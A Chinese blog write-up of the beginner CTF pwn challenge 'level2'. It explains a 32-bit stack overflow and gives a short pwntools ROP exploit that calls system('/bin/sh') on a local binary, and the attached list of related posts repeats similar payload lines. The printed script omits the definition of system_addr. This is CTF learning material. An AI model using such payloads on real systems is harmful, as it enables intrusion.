攻防世界-pwn新手区-level2

最新推荐文章于 2023-08-10 16:10:58 发布
最新推荐文章于 2023-08-10 16:10:58 发布
阅读量297 收藏
点赞数 2
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CHAWUCIREN1/article/details/119106780
版权

在这里插入图片描述
根据题目提示,这个题需要使用rop
运行一下,再file一下
在这里插入图片描述

检查一下保护机制
在这里插入图片描述
丢入ida
在这里插入图片描述
查看vulnerable_function函数,发现有system,证明plt表有这个数据
在这里插入图片描述

可以发现申请0x88的空间,但是却能输入0x100,存在栈溢出
和之前的题目相比,这次没有"/bin/sh"函数
结合题目的提示,我们需要自己构造rop
在这里插入图片描述
buf为0x88,加四个字节到返回地址ret,

利用gdb打印system的地址
在这里插入图片描述
system_addr = 0x8048320
发现有’/bin/sh’
bin_sh_addr = 0x804A024
在这里插入图片描述

所以payload = ‘A’*(0x88+4) + p32(system_addr) + ‘A’*4 +p32(bin_sh_addr)

exp

from pwn import *

bin_sh_addr = 0x804A024
p = process('./level2')
payload = 'A'*(0x88+4) + p32(system_addr) + 'A'*4 +p32(bin_sh_addr)
p.sendline(payload)
p.interactive()

总结:
rop就是利用程序中已有的gadget重新构造成新的代码,然后串联起来,进行利用。

续梦人
关注
专栏目录
攻防世界(pwn篇)---level0
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-13 1577
攻防世界(pwn篇)—level0 文章目录攻防世界(pwn篇)---level0题目描述基本情况分析运行分析IDA 分析分析出payloadexp 题目描述 菜鸡了解了什么是溢出,他相信自己能得到shell 基本情况分析 发现只开启了 NX(数据不可执行)保护机制,因此可以做栈溢出漏洞攻击。 1.RELRO: RELRP会有Pratial RELRO 和FULL RELRO,如果开启FULL RELRO,意味着我们无法修改got表 2.Stack: Canary found 表示不能直接用溢
[CTF-PWN]攻防世界新手村-level0[wp]
murongxuege的博客
10-03 2065
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,64字节,x86也就是amd64微处理器。 checksec的常用命令是:
攻防世界pwn新手练习(level2)
BurYiA的博客
12-24 736
level2 可以看到题上已经有提示了(ROP) 我们看一下程序的保护状态和它的运行情况 开了NX,问题不大。运行可以发现有一个输入点 放IDA里看看 在字符串窗口可以发现有system和**/bin/sh** 这就很舒服了呀,再结合一下题目给的提示,构造ROP链就行 1 1 ...
BUU刷题-Pwn-level2(攻防世界有)
最新发布
一个啥也不会的小菜鸡!
08-10 133
[攻防世界-Pwn-level2]]
攻防世界 pwn 新手练习 level2
ChaoYue_miku的博客
07-05 957
题目描述:菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了’ ** 0、使用file命令查看文件类型,使用checksec查看保护情况,尝试打开文件 ** 32位ELF文件,开启了NX保护和部分地址随机化 (其实checksec就有包含了file的功能) ** 1、使用IDA32 Pro打开文件 ** 题目描述中有提示:面向返回的编程(ROP),所以就要寻找并构造ROP链。 首先查看main()函数 发现有一个vulnerable_function()函数,点进去看一下
攻防世界 pwn新手 level2
kwist_jay的博客
06-14 485
这里我们先下载附件,查看一下文件信息: 32位的i386程序,这里我们用IDA32打开,查看main函数的伪代码 顺藤摸瓜找到输入点buf: 这里我们查看buf的栈结构,他只用了0x88字节但是给了100字节的输入空间,明显的栈溢出 最后两位的返回值s是一个4字节的数组,r为程序返回的地址,就是我们要操作的东西 初步的payload可以定为 'a'*0x88+'aaaa'+..... 我们再往下看,做pwn一般就是找到system函数然后运行自己的命令,所以我们找到了_sy...
攻防世界-wp-PWN-新手-2-level2
Scorpio_m7
01-25 2052
题目来源: XMan 题目描述: 菜鸡请教大神如何获得flag,大神告诉他‘使用面向返回的编程(ROP)就可以了 题目场景 220.249.52.133:56257 题目附件: 1ab77c073b4f4524b73e086d063f884e 题目思路: 构造出0x88长度的buf数据,再输入4个长度的垃圾数据以覆盖ebp,由于是32位程序,所以直接加上call system的地址以及/bin/sh的地址 解题过程: 载入IDA,F5反编译得到伪C代码,发现mian函数中有system,先查看vulnera
攻防世界PWN新手题(PWN——level2)
0pt1mus
12-20 886
level2 转载自原创superj.site 0x00 首先通过file和checksec分析该题的附件。 判断该文件是32位的ELF文件,只开启了不可执行的保护。 0x01 开始进行反汇编,用IDA 32位。 通过左侧的函数窗口发现,只有main、vulnerable_function可用,因此进行分析,两个函数如下图: 通过分析发现,在main函数中首先调用vulnerable_fun...
[CTF-PWN]攻防世界新手村-level2[wp]
murongxuege的博客
10-04 671
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 checksec监测 file查看一下文件属性,可以看到文件是linux elf文件,32字节,Inter80386微处理器。 checksec的常用命令是:c
攻防世界pwn-level2】
a_silly_coder的博客
01-14 260
下载文件后,首先查看保护 将文件拖入ida 32位,发现函数名明示了攻击点 点进vulnerable_function函数后,发现buf距离ebp有0x88的距离,但是可以读入0x100的大小,确定这是一道栈溢出的题目,溢出点就在此处。 确定溢出点后,开始寻找利用方式,发现代码中给出了system函数,在0x8048320的位置 随后寻找sh或者bin_sh字符串: 此时要素齐全,开始编写脚本。 设计栈的结构为: 脚本为: 发送脚本,开始攻击: ...
adworld攻防世界-pwn-新手-wp
令则
03-05 1162
adworld-pwn-新手 tcl 到现在才算是正经昨晚攻防世界的pwn新手, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
level0 -- 攻防世界新手
01-19
来自攻防世界pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
PWN · 总结】call _system与system调用
Mr_Fmnwon的博客
07-30 499
栈溢出漏洞但是限制溢出字符数,倒逼我们减少溢出内容。NSSCTF | 在线CTF平台构造payload的时候有两种方式构造第一种,溢出后的返回地址是system的地址,也就是plt表中system的地址第二种,溢出后的返回地址是call system的地址,这是程序中出现过的调用system的地址。
Pwn基础学习1-[栈溢出]/篇2
m0_52343643的博客
03-29 2330
继上一篇的内容 题目3-ret2syscall 定义 控制程序执行系统调用 原理 不同于之前的 ret2text 和 ret2shellcode 题型,系统调用并不是执行程序中现有的代码或自己写进去的代码,其实就如其字面意思,系统调用就是我们让系统来调用一些函数,那么如何做到让系统来调用,需要满足以下几个条件: 某函数的系统调用号【系统调用号表】—— 放在寄存器 eax 需传入某函数的参数 —— 放在寄存器 ebx、ecx、edx 一个指令 —— int 0x80 int 0x80(软中断)
攻防世界_pwn_level2(萌新版)
TedLau的博客
02-24 2446
首发于鄙人博客:传送门 0x00 前言 32位,NX enabled 0x10 步骤 0x11 main函数 很明显我们需要去查看vulnerable函数。 0x12 vulnerable函数 在这里我们需要向题目中输入若干内容,又观察到buf的长度为0x88,那么我们便可以构造出0x88长度的无关数据,然后再输入4个长度的垃圾数据以覆盖ebp,然...
CTF学习日记----攻防世界pwn高手welpwn
派大星的博客
11-16 544
CTF学习日记----攻防世界pwn高手welpwn 前言 本人CTF菜鸡一枚,今天也是第一次创作博客,今天做了一个ROP链的题目,特地记录一下,如有错误,还请各位大佬批评指正,侵删。 题目 题目没有任何提示,附件扔进kali看看 64位程序,开启NX保护。对于NX保护,我的理解是NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入shellcode时,程序会尝试在数据页面上执行指令,这时就违反了NX,CPU就不干了,从而不能执行恶意指令。但是我们可以通过其他命令绕过NX保护,
栈溢出实例--笔记三(ret2libc)
一只青木呀
08-07 1405
栈溢出实例--笔记三(ret2libc)1、栈溢出含义及栈结构2、ret2libc基本思路3、实战3.1、二进制程序如下3.2、查看栈结构3.3、第一次栈溢出3.4、第二次栈溢出 1、栈溢出含义及栈结构 请参考栈溢出实例–笔记一(ret2text) 栈溢出实例–笔记二(ret2shellcode) 2、ret2libc基本思路 在当一个程序开启了NX(栈不可执行)的时候,我们没办法去写shellcode,而且程序中也没有system函数供我们调用的时候,那此时我们该如何做呢? 首先,程序本身没有system
pwn学习】pwn中直接调用system和调用call system的
Morphy_Amo的博客
12-06 2495
以 XCTF-pwn-新手-004 为例, 本题在构造payload的时候有两种方式构造 第一种,溢出后的返回地址是system的地址,也就是plt表中system的地址 system_addr = 0x08048320 binsh_addr = 0x0804a024 payload = 'a' * (0x88 + 4) + p32(system_addr) + p32(0) + p32(binsh_addr) 第二种,溢出后的返回地址是call system的地址,这是程序中出现过的调用syste
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界PWN刷题-forgot]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值